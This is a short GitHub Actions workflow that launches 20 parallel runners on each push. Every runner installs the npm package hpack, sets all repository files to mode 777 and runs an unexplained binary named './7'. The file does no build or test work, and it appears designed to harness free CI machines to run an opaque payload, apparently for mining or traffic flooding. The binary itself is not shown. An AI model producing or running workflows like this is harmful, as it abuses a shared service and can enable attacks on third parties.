name: Multi Actions
on: {push: {branches: [main]}}
jobs:
  run:
    runs-on: ubuntu-latest
    strategy: {matrix: {runner: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]}}
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Lệnh #1
        run: npm i hpack
      - name: Lệnh #2
        run: chmod 777 * && ./7
